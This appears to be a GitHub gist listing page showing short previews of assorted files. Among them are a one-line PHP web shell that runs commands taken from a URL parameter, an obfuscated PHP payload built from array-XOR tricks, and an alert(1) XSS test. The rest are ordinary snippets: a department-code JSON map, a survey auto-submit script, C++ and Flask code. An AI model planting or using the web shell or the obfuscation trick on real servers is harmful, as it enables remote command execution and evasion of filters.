This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@splitline | |
<?php | |
system($_GET['cmd']); | |
?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
meow |
,.jpg)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
(((([].[]))[([]^[[]])+([]^[[]])+([]^[[]])]^(([]^[]).[])[([]^[])]^(([]^[[]])+([]^[[]]).[])[([]^[])]).((([].[]))[([]^[[]])]).((([].[]))[([]^[[]])+([]^[[]])+([]^[[]])]^(([]^[]).[])[([]^[])]^(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[])[([]^[])]).((([].[]))[([]^[[]])+([]^[[]])+([]^[[]])]).((([].[]))[([]^[])]^(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[])[([]^[])]).((([].[]))[([]^[[]])+([]^[[]])+([]^[[]])]^(([]^[]).[])[([]^[])]^(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[])[([]^[])]).((([].[]))[([]^[[]])]^(([].[]))[([]^[[]])+([]^[[]])+([]^[[]])]^(([].[]))[([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])]^(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[])[([]^[])]).((([].[]))[([]^[[]])+([]^[[]])+([]^[[]])]^(([]^[]).[])[([]^[])]^(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[])[([]^[])]).((([].[]))[([]^[])]^(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[])[([]^[])]).((([].[]))[([]^[[]])+([]^[[]])+([]^[[]])]^(([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]])+([]^[[]]).[])[([]^[])]^(([]^[[] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"AC": "工程技術研究所自動化及控制學程(自動化及控制研究所)", | |
"FN": "財務金融研究所", | |
"AD": "建築系", | |
"GD": "全球發展工程學士學位學程", | |
"AT": "應用科技學士學位學程", | |
"GE": "人文社會學科", | |
"BA": "企業管理系", | |
"GX": "學士後綠能產業機電工程學士學位學程", | |
"BB": "醫學工程學士學位學程", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.querySelectorAll('font>a').forEach(e=>{ | |
const i=document.createElement('iframe'); | |
i.src=e.href; | |
document.body.appendChild(i); | |
i.onload= _ => { | |
const iw = i.contentWindow; | |
iw.alert=console.log; | |
[...iw.document.querySelectorAll("input[type=radio]")].filter((_,i)=>i%5===0).forEach(x=>x.checked=true); | |
iw.document.querySelector("input#Btn_save").click(); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <cstdio> | |
// #include <unordered_map> | |
#include <algorithm> | |
#include <vector> | |
char _getchar() | |
{ | |
static char buf[1000000], *p1 = buf, *p2 = buf; | |
return p1 == p2 && (p2 = (p1 = buf) + fread(buf, 1, 1000000, stdin), p1 == p2) ? EOF : *p1++; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import Flask | |
app = Flask(__name__) | |
@app.route('/') | |
def hello_world(): | |
return 'Hello World’ | |
if __name__ == '__main__': | |
app.run() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alert(1); |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
NewerOlder